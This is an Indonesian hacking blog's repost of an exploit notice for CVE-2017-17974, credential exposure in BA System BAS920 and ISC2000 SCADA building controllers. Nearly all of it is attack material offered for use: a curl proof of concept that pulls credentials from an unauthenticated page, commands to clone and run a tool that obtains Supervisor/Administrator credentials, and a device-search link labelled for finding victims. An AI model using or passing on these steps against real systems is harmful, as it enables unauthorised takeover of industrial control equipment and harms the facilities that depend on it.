Selamat Datang Di Bagian Intelligence Gathering Garuda Security Hacker

Dengan Mengakses Laman Ini Berarti Anda Setuju Bahwa Setiap Dampak Dan Resiko Penyalahgunaan Konten Ditanggung Oleh Anda Sendiri

Informasi di Tiap Laman Akan Terus diupdate secara berkala

Jumat, 18 Mei 2018

Exploit: SCADAS "BAS920 & ISC2000": Credentials Exposed


[*] Exploit Title: "SCADAS "BAS920 & ISC2000"; Credentials Exposed”
[*] CVE: CVE-2017-17974
[*] Date: 29/12/2017
[*] Exploit Author: Fernandez Ezequiel ( @capitan_alfa ) && Bertin Jose ( @bertinjoseb )
[*] Vendor: BA System
[*] devices(tested): BAS920 & ISC2000



PoC:
curl http://<host>/isc/get_sid_js.aspx
tool
usr@pwn:~$ git clone https://github.com/ezelf/baCK_system.git
usr@pwn:~$ cd baCK_system
usage
usr@pwn:~/$ python plinplanplum.py --help
python plinplanplum.py --help
usage: plinplanplum.py [-h] [-v] --host HOST [--port PORT]
[+] Obtaining all credentials for the Supervisor/Administrator account
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port
[+] Demo: python plinplanplum.py --host 192.168.1.101 -p 81
Search Devices vicitms:
https://www.zoomeye.org/searchResult?q=HTTPserv&t=host
https://github.com/ezelf/baCK_system

From : https://www.facebook.com/Ksecureteam/
Share: